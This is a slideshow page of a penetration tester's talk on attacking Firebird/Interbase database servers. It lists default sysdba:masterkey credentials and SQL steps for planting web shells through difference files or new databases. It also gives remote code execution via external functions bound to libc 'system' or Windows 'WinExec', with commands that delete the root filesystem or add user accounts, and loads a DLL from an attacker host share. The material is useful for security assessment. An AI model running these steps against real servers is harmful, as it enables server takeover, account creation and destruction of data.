Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Firebird Interbase Database engine hacks or rtfm

16,724 views

Published on

Notes on database security assesment

Published in: Technology
  • Be the first to comment

Firebird Interbase Database engine hacks or rtfm

  1. 1. Firebird/interbase database engine hacks or RTFM Osipov Alexey @GiftsUngiven
  2. 2. /whoami • Osipov Alexey • Web-hacker, pentester, member of SCADAStrangeLove • PHDays, BlackHat, NoSuchCon speaker • Developer of different pentesting PoC’s – XML – MySQL Twitter: @GiftsUngiven
  3. 3. Why so serious? • “Pseudo” Market shares – mysql, MSSQL, Oracle, postgresql, … • 99% – Firebird • 1% • That means – mysql, MSSQL, Oracle, postgresql, … • N ways to own them – Firebird • None ways to own it –
  4. 4. Pentesting • Requirements – SQLi • https://forum.antichat.ru/ • https://rdot.org – Account • Which is sysdba:masterkey most of the time • No ways to escape it – RW filesystem – Execute – So..
  5. 5. File creation (part 1) • Create difference file – CONNECT '<host>:<existent database>'; – ALTER DATABASE ADD DIFFERENCE FILE 'filename'; – ALTER DATABASE BEGIN BACKUP; – INSERT INTO TABLE `exploited` VALUES (‘<ASP/JSP/PHP shell>’); – COMMIT; • Your file is locked, so – EXIT;
  6. 6. File creation (part 2) • Database creation – CREATE DATABASE '<host>:<abritrary non-existent path>'; – CREATE TABLE a ('value' BLOB); – INSERT INTO a VALUES ('<ASP/JSP/PHP shell>'); – COMMIT; • Again, your file is locked – EXIT
  7. 7. RCE (part 1) • Main problem if configuration (but sometimes enabled): • • • *nix (like in PostgreSQL) – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'system' MODULE_NAME '/lib/libc.so'; – SELECT FIRST 1 exec('rm /* -rf') FROM any_table LIMIT 1;
  8. 8. RCE (part 2) • Windows – DECLARE EXTERNAL FUNCTION exec cstring(4096), integer RETURNS integer BY VALUE ENTRY_POINT 'WinExec' MODULE_NAME 'c:windowssystem32kernel32.dll'; – SELECT FIRST 1 exec('net user /add ****', 1) FROM any_table LIMIT 1; • Kudos to Alexander Tlyapov (@Rigros1) •
  9. 9. RCE (part 3) • Windows – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'Exec' MODULE_NAME 'evilhostshareudf.dll'; – SELECT FIRST 1 exec('net user /add ****') FROM any_table LIMIT 1; • No NTLM auth  on host, so SAMBA with anonymous login only • Can create any needed function
  10. 10. Questions? @GiftsUngiven

×